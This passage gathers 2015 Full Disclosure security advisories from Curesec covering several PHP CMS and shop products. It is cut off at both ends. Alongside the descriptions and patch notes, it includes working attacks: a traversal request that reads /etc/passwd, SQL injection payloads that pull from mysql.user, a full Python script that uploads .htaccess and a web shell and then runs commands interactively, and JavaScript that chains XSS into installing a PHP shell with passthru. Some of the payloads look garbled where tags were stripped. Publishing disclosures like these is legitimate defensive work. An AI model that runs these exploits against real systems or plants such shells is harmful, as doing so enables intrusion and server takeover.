Description
The value of the GET parameter doc is passed to trigger_error if it is invalid.
trigger_error does not encode input, and as LiteCart shows errors by default,
this leads to an XSS vulnerability. Additionally, the accessing of non-existing
array values leads to a notice, which contains the index unsanitized. Because
of this, $app_config['docs'][$_GET['doc']] can also lead to XSS.
Proof of Concept
http://localhost/ecommerce/litecart-1.3.2/public_html/admin/?app=appearance&doc=alert(1)
Code
admin/index.php
if (!empty($_GET['doc'])) {
if (empty($app_config['docs'][$_GET['doc']]) ||
!file_exists(FS_DIR_HTTP_ROOT . WS_DIR_ADMIN . $_GET['app'].'.app/' .
$app_config['docs'][$_GET['doc']])) trigger_error($_GET['app'] .'.app/'.
$_GET['doc'] . ' is not a valid admin document', E_USER_ERROR);
include vmod::check(FS_DIR_HTTP_ROOT . WS_DIR_ADMIN .
$_GET['app'].'.app/' . $app_config['docs'][$_GET['doc']]);
} else {
include vmod::check(FS_DIR_HTTP_ROOT . WS_DIR_ADMIN .
$_GET['app'].'.app/' . $app_config['docs'][$app_config['default']]);
}
5. Solution
To mitigate this issue please upgrade at least to version 1.3.3:
https://www.litecart.net/downloading?version=1.3.3.1
Please note that a newer version might already be available.
6. Report Timeline
09/07/2015 Informed Vendor about Issue
10/05/2015 Vendor releases fix
11/13/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/LiteCart-132-Multiple-XSS-72.html
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] ClipperCMS 1.3.0: XSS
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:ClipperCMS 1.3.0
Fixed in:not fixed
Fixed Version Link: n/a
Vendor Website: http://www.clippercms.com/
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public: 11/13/2015
Release mode:Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
There are various XSS vulnerabilities in ClipperCMS 1.3.0. Some require
specific non-default settings, while others do not require these settings.
3. XSS 1
CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Proof of Concept
http://localhost/ClipperCMS-clipper_1.3.0/manager/media/browser/mcpuk/connectors/php/connector.php?foo=bar
4. XSS 2
CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Description
The name, email, message, and subjected parameter of the Contact form are
vulnerable to XSS.
Contrary to the XSS issues in the admin area described below, these XSS work
without clickjacking or specific settings regarding referers.
Proof of Concept
The POCs for name and subjected are equivalent to this POC for email:
http://localhost/ClipperCMS-clipper_1.3.0/index.php?id=6";
method="POST">
POC for message:
http://localhost/ClipperCMS-clipper_1.3.0/index.php?id=6";
method="POST">
alert(1)" />
5. XSS 3
CVSS
Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N
Description
The search field of the System Events page is vulnerable to XSS. To execute the
provided POC, the setting "Validate HTTP_REFERER headers" should be set to
false. Please note that it is likely possible to exploit this issue via
ClickJacking even if that setting is set to true.
Proof of Concept
http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=114";
method="POST">
6. XSS 4ff
CVSS
Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N
Description
Multiple parameters of various components of the admin area are vulnerable to
XSS.
To execute these POC, the setting "Validate HTTP_REFERER headers" should be set
to false.
Proof of Concept
http://localhost//ClipperCMS-clipper_1.3.0/manager/index.php?a=75&r=);}alert(1);function
foo(){doRefresh(
http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=31&mode=drill&path=foo';alert(1);var
bar='
http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=88";>&id=1
http://localhostClipperCMS-clipper_1.3.0/manager/index.php?a=114&id=&listmode=";>&op=&search=test
http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=88&id=1";>
7. Solution
This issue has not been fixed by the vendor.
8. Report Timeline
10/02/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/ClipperCMS-130-XSS-101.html
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] ClipperCMS 1.3.0: Path Traversal
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:ClipperCMS 1.3.0
Fixed in:not fixed
Fixed Version Link: n/a
Vendor Website: http://www.clippercms.com/
Vulnerability Type: Path Traversal
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public: 11/13/2015
Release mode:Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Vulnerability Description
CVSS
Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N
Description
The "file" Parameter of the file browser is vulnerable to directory traversal,
allowing the download of arbitrary files.
A user account is needed with at least the lowest default role, which is
"Editor".
3. Proof of Concept
POST
/ClipperCMS-clipper_1.3.0/manager/media/browser/kcfinder/browse.php?type=images&lng=en&act=download
HTTP/1.1
dir=images&file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
4. Code
/ClipperCMS-clipper_1.3.0/manager/media/browser/kcfinder/core/browser.php
protected function act_download() {
$dir = $this->postDir();
if (!isset($this->post['dir']) ||
!isset($this->post['file']) ||
(false === ($file = "$dir/{$this->post['file']}")) ||
!file_exists($file) || !is_readable($file)
)
$this->errorMsg("Unknown error.");
header("Pragma: public");
header("Expires: 0");
header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
header("Cache-Control: private", false);
header("Content-Type: application/octet-stream");
header('Content-Disposition: attachment; filename="' . str_replace('"',
"_", $this->post['file']) . '"');
header("Content-Transfer-Encoding:Â binary");
header("Content-Length: " . filesize($file));
readfile($file);
die;
}
5. Solution
This issue has not been fixed by the vendor.
6. Report Timeline
10/02/2015 Informed Vendor about Issue (no reply)
10/21/2015 Reminded Vendor of Disclosure Date (no reply)
11/13/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/ClipperCMS-130-Path-Traversal-98.html
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] ClipperCMS 1.3.0: SQL Injection
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:ClipperCMS 1.3.0
Fixed in:not fixed
Fixed Version Link: n/a
Vendor Website: http://www.clippercms.com/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public: 11/13/2015
Release mode:Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
There are multiple SQL Injection vulnerabilities in ClipperCMS 1.3.0.
An account with the role "Publisher" or "Administrator" is needed to exploit
each of these vulnerabilities.
3. SQL Injection 1 (Blind)
CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description
The id parameter of the web user editor is vulnerable to blind SQL Injection.
To exploit this issue, an account is needed that has the right to manage web
users. Users with the role "Publisher" or "Administrator" have this by default.
Proof of Concept
http://localhost//ClipperCMS-clipper_1.3.0/manager/index.php?a=88&id=1 AND
IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(5000,ENCODE('MSG','by 5
seconds')),null) %23
-> true
http://localhost//ClipperCMS-clipper_1.3.0/manager/index.php?a=88&id=1 AND
IF(SUBSTRING(version(), 1, 1)='4',BENCHMARK(5000,ENCODE('MSG','by 5
seconds')),null) %23
-> false
Code
/manager/actions/mutate_web_user.dynamic.php
$sql = "SELECT * FROM $dbase.`".$table_prefix."web_groups` where
webuser=".$_GET['id']."";
4. SQL Injection 2
CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description
When updating a user, the newusername parameter is vulnerable to SQL injection.
To exploit this issue, an account is needed that has the right to manage web
users. Users with the role "Publisher" or "Administrator" have this by default.
Proof of Concept
POST /ClipperCMS-clipper_1.3.0/manager/index.php?a=32 HTTP/1.1
mode=12&id=3&blockedmode=0&stay=&oldusername=testtest
&newusername=testtest' or extractvalue(1,concat(0x7e,(SELECT concat(user) FROM
mysql.user limit 0,1))) -- -
&newpassword=0&passwordgenmethod=g&specifiedpassword=&confirmpassword=&passwordnotifymethod=s&fullname=&email=foo3%40example.com&oldemail=foo3%40example.com&role=2&phone=&mobilephone=&fax=&state=&zip=&country=&dob=&gender=&comment=&failedlogincount=0&blocked=0&blockeduntil=&blockedafter=&manager_language=english&manager_login_startup=&allow_manager_access=1&allowed_ip=&manager_theme=&filemanager_path=&upload_images=&default_upload_images=1&upload_media=&default_upload_media=1&upload_flash=&default_upload_flash=1&upload_files=&default_upload_files=1&upload_maxsize=&which_editor=&editor_css_path=&rb_base_dir=&rb_base_url=&tinymce_editor_theme=&tinymce_custom_plugins=&tinymce_custom_buttons1=&tinymce_custom_buttons2=&tinymce_custom_buttons3=&tinymce_custom_buttons4=&tinymce_css_selectors=&photo=&save=Submit+Query
Code
/manager/processors/save_user_processor.php
$sql = "UPDATE " . $modx->getFullTableName('manager_users') . "
SET username='$newusername'" . $updatepasswordsql . "
WHERE id=$id";
5. SQL Injection 3
CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P
Description
When updating a user, the country, role, blocked, blockeduntil, blockedafter,
failedlogincount, and gender parameter are vulnerable to SQL injection.
To exploit this issue, an account is needed that has the right to manage web
users. Users with the role "Publisher" or "Administrator" have this by default.
Proof of Concept
The proof of concepts for the country, role, blocked, blockeduntil,
failedlogincount, and blockedafter parameter are analog to this POC for gender:
POST /ClipperCMS-clipper_1.3.0/manager/index.php?a=32 HTTP/1.1
mode=12&id=3&blockedmode=0&stay=&oldusername=testtest&newusername=testtest&newpassword=0&passwordgenmethod=g&specifiedpassword=&confirmpassword=&passwordnotifymethod=s&fullname=&email=foo6%40example.com&oldemail=foo3%40example.com&role=2&phone=&mobilephone=&fax=&state=&zip=&country=&dob=
&gender=2', fax=(SELECT concat(user) FROM mysql.user limit 0,1), dob='0
&comment=&failedlogincount=0&blocked=0&blockeduntil=&blockedafter=&manager_language=english&manager_login_startup=&allow_manager_access=1&allowed_ip=&manager_theme=&filemanager_path=&upload_images=&default_upload_images=1&upload_media=&default_upload_media=1&upload_flash=&default_upload_flash=1&upload_files=&default_upload_files=1&upload_maxsize=&which_editor=&editor_css_path=&rb_base_dir=&rb_base_url=&tinymce_editor_theme=&tinymce_custom_plugins=&tinymce_custom_buttons1=&tinymce_custom_buttons2=&tinymce_custom_buttons3=&tinymce_custom_buttons4=&tinymce_css_selectors=&photo=&save=Submit+Query
Visiting the overview page of that user will show the result of the injected
query.
Code
/manager/processors/save_user_processor.php
$sql = "UPDATE " . $modx->getFullTableName('user_attributes') . "
SET fullname='$fullname', role='$roleid', email='$email', phone='$phone',
mobilephone='$mobilephone', fax='$fax', zip='$zip', state='$state',
country='$country', gender='$ge
[FD] ClipperCMS 1.3.0: CSRF
Security Advisory - Curesec Research Team 1. Introduction Affected Product:ClipperCMS 1.3.0 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: http://www.clippercms.com/ Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to public: 11/13/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description CVSS Medium 5.1 AV:N/AC:L/Au:S/C:P/I:P/A:P Description The only protection against CSRF is a referer check. This check can be disabled by a user with the rights to edit settings, thus making the application vulnerable to CSRF. A user may choose to disable referer checks, because when they are enabled, external links or direct entry/bookmarks to specific pages in the backend do not work, which severely limits the usability of the application 3. Solution This issue has not been fixed by the vendor. 4. Report Timeline 10/02/2015 Informed Vendor about Issue (no reply) 10/21/2015 Reminded Vendor of Disclosure Date (no reply) 11/13/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/ClipperCMS-130-CSRF-97.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] ClipperCMS 1.3.0: Code Execution Exploit
#!/usr/local/bin/python
# Exploit for ClipperCMS 1.3.0 Code Execution vulnerability
# An account is required with rights to file upload (eg a user in the Admin,
Publisher, or Editor role)
# The server must parse htaccess files for this exploit to work.
# Curesec GmbH c...@curesec.com
import sys
import re
import requests # requires requests lib
if len(sys.argv) != 4:
exit("usage: python " + sys.argv[0] + " http://example.com/ClipperCMS/
admin admin")
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
loginPath = "/manager/processors/login.processor.php"
fileManagerPath = "/manager/index.php?a=31"
def login(requestSession, url, username, password):
postData = {"ajax": "1", "username": username, "password": password}
return requestSession.post(url, data = postData, headers = {"referer": url})
def getFullPath(requestSession, url):
request = requestSession.get(url, headers = {"referer": url})
if "You don't have enough privileges" in request.text:
return "cant upload"
fullPath = re.search("var current_path = '(.*)';", request.text)
return fullPath.group(1)
def upload(requestSession, url, fileName, fileContent, postData):
filesData = {"userfile[0]": (fileName, fileContent)}
return requestSession.post(url, files = filesData, data = postData, headers
= {"referer": url})
def workingShell(url, fullPath):
return fullPath.strip("/") in requests.get(url + "pwd", headers =
{"referer": url}).text.strip("/")
def runShell(url):
print("enter command, or enter exit to quit.")
command = raw_input("$ ")
while "exit" not in command:
print(requests.get(url + command).text)
command = raw_input("$ ")
requestSession = requests.session()
loginResult = login(requestSession, url + loginPath, username, password)
if "Incorrect username" in loginResult.text:
exit("ERROR: Incorrect username or password")
else:
print("successful: login as " + username)
fullPath = getFullPath(requestSession, url + fileManagerPath)
if fullPath == "cant upload":
exit("ERROR: user does not have required privileges")
else:
print("successful: user is allowed to use file manager. Full path: " +
fullPath)
uploadResult = upload(requestSession, url + fileManagerPath, ".htaccess",
"AddType application/x-httpd-php .png", {"path": fullPath})
if "File uploaded successfully" not in uploadResult.text:
exit("ERROR: could not upload .htaccess file")
else:
print("successful: .htaccess upload")
uploadResult = upload(requestSession, url + fileManagerPath, "404.png", "", {"path": fullPath})
if "File uploaded successfully" not in uploadResult.text:
exit("ERROR: could not upload shell")
else:
print("successful: shell upload. Execute commands via " + url +
"404.png?x=")
if workingShell(url + "404.png?x=", fullPath):
print("successful: shell seems to be working")
else:
exit("ERROR: shell does not seem to be working correctly")
runShell(url + "404.png?x=")
#Blog Reference:
#http://blog.curesec.com/article/blog/ClipperCMS-130-Code-Execution-Exploit-96.html
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] ClipperCMS 1.3.0: Code Execution
Security Advisory - Curesec Research Team 1. Introduction Affected Product:ClipperCMS 1.3.0 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: http://www.clippercms.com/ Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to public: 11/13/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description CVSS High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description The file upload uses a whitelist to only allow non-dangerous file extensions. However, it does allow the upload of .htaccess files, which means that an attacker can upload files with any extension and still gain code execution. An account is required to upload files. The role the account is in needs the right to upload files. By default, the lowest user role - Editor - has this right. 3. Proof of Concept The file upload can be found here: http://localhost/ClipperCMS-clipper_1.3.0/manager/index.php?a=31 To gain code execution, upload a .htaccess file with the content: AddType application/x-httpd-php .png Now, any uploaded file containing PHP code with the extension .png will be executed. 3. Solution This issue has not been fixed by the vendor. 4. Report Timeline 10/02/2015 Informed Vendor about Issue (no reply) 10/21/2015 Reminded Vendor of Disclosure Date (no reply) 11/13/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/ClipperCMS-130-Code-Execution-95.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] dotclear 2.8.1: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:dotclear 2.8.1 Fixed in:2.8.2 Fixed Version Link: http://download.dotclear.org/latest.zip Vendor Website: http://dotclear.org/ Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to public: 11/13/2015 Release mode:Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N Description The Comment author name is echoed inside the value attribute of an input tag when viewing the list of all comments for that author. Quotes are not encoded, which allows for the addition of further attributes to the tag. The field is hidden, so onfocus or similar do not work, and the length of the name is limited, which makes an actual exploitation unlikely. Still, with older browser an attacker might try to inject a style attribute which may lead to XSS. 3. Proof of Concept 1. Create comment with author name " newattribute="value 2. Visit http://localhost/dotclear/admin/comments.php?n=30&status=&sortby=comment_dt&order=desc&author=%22+newattribute%3D%22value 3. The result will be: 4. Solution To mitigate this issue please upgrade at least to version 2.8.2: http://download.dotclear.org/latest.zip Please note that a newer version might already be available. 5. Report Timeline 10/02/2015 Informed Vendor 10/25/2015 Vendor releases fix 11/13/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/dotclear-281-XSS-94.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] dotclear 2.8.1: Code Execution
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:dotclear 2.8.1
Fixed in:2.8.2
Fixed Version Link: http://download.dotclear.org/latest.zip
Vendor Website: http://dotclear.org/
Vulnerability Type: Code Execution
Remote Exploitable: Yes
Reported to vendor: 10/02/2015
Disclosed to public: 11/13/2015
Release mode:Coordinated release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
CVSS
High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C
Description
While upload of files with extension php, php4, and php5 is forbidden, upload
of files with the extension pht, phps, and phtml is allowed, which will lead to
code execution with most default Apache configurations.
The upload form is located here:
http://localhost/dotclear/admin/media.php?popup=1&plugin_id=dcLegacyEditor
A user with the right "manage their own media items" and "manage their own
entries and comments" is needed to exploit this issue.
3. Code
/dotclear/inc/libs/clearbricks/filemanager
public function uploadFile($tmp,$dest,$overwrite=false)
{
$dest = $this->pwd.'/'.path::clean($dest);
if ($this->isFileExclude($dest)) {
throw new Exception(__('Uploading this file is not allowed.'));
}
[...]
if (@move_uploaded_file($tmp,$dest) === false) {
throw new Exception(__('An error occurred while writing the
file.'));
}
[...]
}
[...]
protected function isFileExclude($f)
{
if (!$this->exclude_pattern) {
return false;
}
return preg_match($this->exclude_pattern,$f);
}
/dotclear/inc/core/class.dc.media.php
$this->exclude_pattern = $core->blog->settings->system->media_exclusion;
/dotclear/inc/core/class.dc.core.php
array('media_exclusion','string','/\.php[0-9]*$/i',
'File name exclusion pattern in media manager. (PCRE
value)'),
Note that after installation, the regex is retrieved from the settings table of
the database, not from the code.
4. Solution
To mitigate this issue please upgrade at least to version 2.8.2:
http://download.dotclear.org/latest.zip
Please note that a newer version might already be available.
5. Report Timeline
10/02/2015 Informed Vendor
10/25/2015 Vendor releases fix
11/13/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/dotclear-281-Code-Execution-93.html
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Open Source Social Network 3.5: XSS
Security Advisory - Curesec Research Team
1. Introduction
Affected Open Source Social Network 3.5
Product:
Fixed in:3.6
Fixed Versionhttps://www.opensource-socialnetwork.org/downloads/
Link:ossn-v3.6-1443545762.zip
Vendor Contact: https://www.opensource-socialnetwork.org/contact
VulnerabilityXSS
Type:
Remote Yes
Exploitable:
Reported to 09/29/2015
vendor:
Disclosed to 11/13/2015
public:
Release mode:Coordinated release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
There are two reflected XSS vulnerabilities in Open Source Social Network 3.5.
With this, it is possible to inject JavaScript keyloggers, or to bypass CSRF
protection, which in this case may lead to code execution.
3. XSS 1
CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Proof of Concept
http://localhost/ossn/search?q='">alert(1)
Code
/ossn/themes/default/plugins/menus/search.php
$menus = $params['menu'];
echo "";
echo '' . ossn_print('result:type') . '';
foreach ($menus as $menu => $val) {
foreach ($val as $link) {
$menu = str_replace(':', '-', $link['text']);
$icon = ossn_site_url() . "components/OssnSearch/images/{$menu}.png";
$text = ossn_print($link['text']);
$link = $link['href'];
echo "
{$text}
";
}
}
echo '';
4. XSS 2
CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Proof of Concept
http://localhost/ossn/home?offset=2&foo='">alert(1)
Code
/ossn/themes/default/pagination/view.php
if (count($_GET)) {
$args_url = '';
foreach ($_GET as $key => $value) {
if ($key != 'page') {
$args_url .= '&' . $key . '=' . $value;
}
}
}
[...]
$url = "?offset={$first}{$args_url}";
echo "".ossn_print('ossn:pagination:first')."";
5. XSS to Code Execution
Description
Because the backend allows the upload of PHP files, the XSS vulnerabilities can
lead to code execution.
Proof of Concept
http://localhost/ossn/search?q='">http://localhost/s.js>
/s.js:
var csrfProtectedPage = 'http://localhost/ossn/administrator/theme_installer';
var html = get(csrfProtectedPage);
document.body.innerHTML = html;
var token = document.getElementsByName("ossn_token")[0].value;
var timestamp = document.getElementsByName("ossn_ts")[0].value;
submitRequest(token, timestamp);
function get(url) {
var xmlHttp = new XMLHttpRequest();
xmlHttp.open("GET", url, false);
xmlHttp.send(null);
return xmlHttp.responseText;
}
function submitRequest(token, timestamp) {
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://localhost/ossn/action/admin/theme_install";, true);
xhr.setRequestHeader("Accept",
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data;
boundary=---1441530840601255132539565608");
xhr.withCredentials = true;
var body = "-1441530840601255132539565608\r\n" +
"Content-Disposition: form-data; name=\"ossn_ts\"\r\n" +
"\r\n" +
"" + timestamp + "\r\n" +
"-1441530840601255132539565608\r\n" +
"Content-Disposition: form-data; name=\"ossn_token\"\r\n" +
"\r\n" +
"" + token + "\r\n" +
"-1441530840601255132539565608\r\n" +
"Content-Disposition: form-data; name=\"theme_file\";
filename=\"mycustomtheme.zip\"\r\n" +
"Content-Type: application/x-zip-compressed\r\n" +
"\r\n" +
"PK\x03\x04\x14\x03\x00\x00\x00\x00\xe5x\x3cG\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00mycustomtheme/PK\x03\x04\n"
+
"\x03\x00\x00\x00\x00\xbcx\x3cG\xf6+\xec\x8e\x1c\x00\x00\x00\x1c\x00\x00\x00\x15\x00\x00\x00mycustomtheme/404.php\x3c?php
passthru($_GET[\'x\']);\n" +
"PK\x03\x04\n" +
"\x03\x00\x00\x00\x00\xe1x\x3cG\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00mycustomtheme/ossn_theme.phpPK\x03\x04\n"
+
"\x03\x00\x00\x00\x00\xe5x\x3cG\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00mycustomtheme/ossn_theme.xmlPK\x01\x02?\x03\x14\x03\x00\x00\x00\x00\xe5x\x3cG\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x80\xedA\x00\x00\x00\x00mycustomtheme/PK\x01\x02?\x03\n"
+
"\x03\x00\x00\x00\x00\xbcx\x3cG\xf6+\xec\x8e\x1c\x00\x00\x00\x1c\x00\x00\x00\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x80\xa4\x81,\x00\x00\x00mycustomtheme/404.phpPK\x01\x02?\x03\n" +
"\x03\x00\x00\x00\x00\xe1x\x3cG\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x80\xa4\x81{\x00\x00\x00mycustomtheme/ossn_theme.phpPK\x01\x02?\x03\n" +
"\x03\x00\x00\x00\x00\xe5x\x3cG\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x00\x00
\x80\xa4\x81\xb5\x00\x00\x00mycustomtheme/ossn_theme.xmlPK\x05\x06\x00\x00\x00\x00\x04\x00\x04\x00\x13\x01\x00\x00\xef\x00\x00\x00\x00\x00\r\n"
[FD] Sitemagic CMS 4.1: XSS
Security Advisory - Curesec Research Team
1. Introduction
AffectedSitemagic CMS 4.1
Product:
Fixed in: 4.1.1
Fixed Version http://sitemagic.org/index.php?SMExt=SMDownloads&;
Link: SMDownloadsFile=SitemagicCMS411.zip
Vendor Contact: d...@sitemagic.org
Vulnerability XSS
Type:
Remote Yes
Exploitable:
Reported to 09/29/2015
vendor:
Disclosed to11/13/2015
public:
Release mode: Coordinated release
CVE:n/a
Credits Tim Coen of Curesec GmbH
2. Overview
CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Description
If debug is enabled - which it is by default - the values of POST and GET are
echoed unencoded, leading to an XSS vulnerability. With this, it is possible to
inject JavaScript keyloggers, or to bypass CSRF protection, which in this case
may lead to code execution.
3. Proof of Concept
http://localhost/Sitemagic/?dump=true&foo='">alert(1)
4. Code
index.php
if ($debug === true)
{
$end = microtime(true);
if (isset($_REQUEST["dump"]) === true)
{
$time = $end - $start;
echo "Memory usage: " . memory_get_usage(true) / 1024 . "
KB";
echo "Time usage: " . $time . " seconds";
echo "
POST
" . print_r($_POST, true) . "
GET
" . print_r($_GET, true) . "
";
}
}
5. XSS to Code Execution
Because the file upload in the admin area does not restrict the file type, an
attacker can gain code execution via the XSS vulnerability.
http://localhost/Sitemagic/?dump=true&foo=";>http://localhost/s.js";>
/s.js:
submitRequest();
function submitRequest() {
var xhr = new XMLHttpRequest();
xhr.open("POST",
"http://localhost/Sitemagic/index.php?SMExt=SMFiles&SMTemplateType=Basic&SMExecMode=Dedicated&SMFilesUpload&SMFilesUploadPath=files%2Fimages%2Fdemo";,
true);
xhr.setRequestHeader("Accept",
"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "multipart/form-data;
boundary=---72100436920187879541838388265");
xhr.withCredentials = true;
var body = "-72100436920187879541838388265\r\n"
+
"Content-Disposition: form-data; name=\"SMInputSMFilesUpload\";
filename=\"shell.php\"\r\n" +
"Content-Type: application/x-php\r\n" +
"\r\n" +
"\x3c?php passthru($_GET[\'x\']); ?\x3e\n" +
"\r\n" +
"-72100436920187879541838388265\r\n" +
"Content-Disposition: form-data; name=\"SMPostBackControl\"\r\n" +
"\r\n" +
"\r\n" +
"-72100436920187879541838388265--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
6. Solution
To mitigate this issue please upgrade at least to version 4.1.1:
http://sitemagic.org/index.php?SMExt=SMDownloads&SMDownloadsFile=
SitemagicCMS411.zip
Please note that a newer version might already be available.
7. Report Timeline
09/29/2015 Informed Vendor about Issue
09/29/2015 Vendor releases fix
11/13/2015 Disclosed to public
Blog Reference:
http://blog.curesec.com/article/blog/Sitemagic-CMS-41-XSS-91.html
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Thelia 2.2.1: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Thelia 2.2.1 Fixed in:not fixed Fixed Version Link: n/a Vendor Contact: i...@thelia.net Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 09/29/2015 Disclosed to public: 11/13/2015 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview CVSS Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description Thelia 2.2.1 suffers from an XSS vulnerability. With this, it is for example possible to inject JavaScript keyloggers, or to bypass CSRF protection. 3. Proof of Concept http://localhost/thelia_2.1.5/web/admin/home/stats?month=95&year=20155 4. Solution This issue has not been fixed by the vendor 5. Report Timeline 09/29/2015 Informed Vendor about Issue (no reply) 10/21/2015 Reminded Vendor of Disclosure Date (no reply) 11/13/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/Thelia-221-XSS-90.html ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] TomatoCart v1.1.8.6.1: XSS
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:TomatoCart v1.1.8.6.1
Fixed in:not fixed
Fixed Version Link: n/a
Vendor Contact: supp...@tomatocart.com
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/29/2015
Disclosed to public: 11/13/2015
Release mode:Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
There are two reflected XSS vulnerabilities in TomatoCart v1.1.8.6.1. With
this, it is possible to inject JavaScript keyloggers, or to bypass CSRF
protection, which in the case of TomatoCart may lead to code execution.
3. XSS 1
CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Proof of Concept
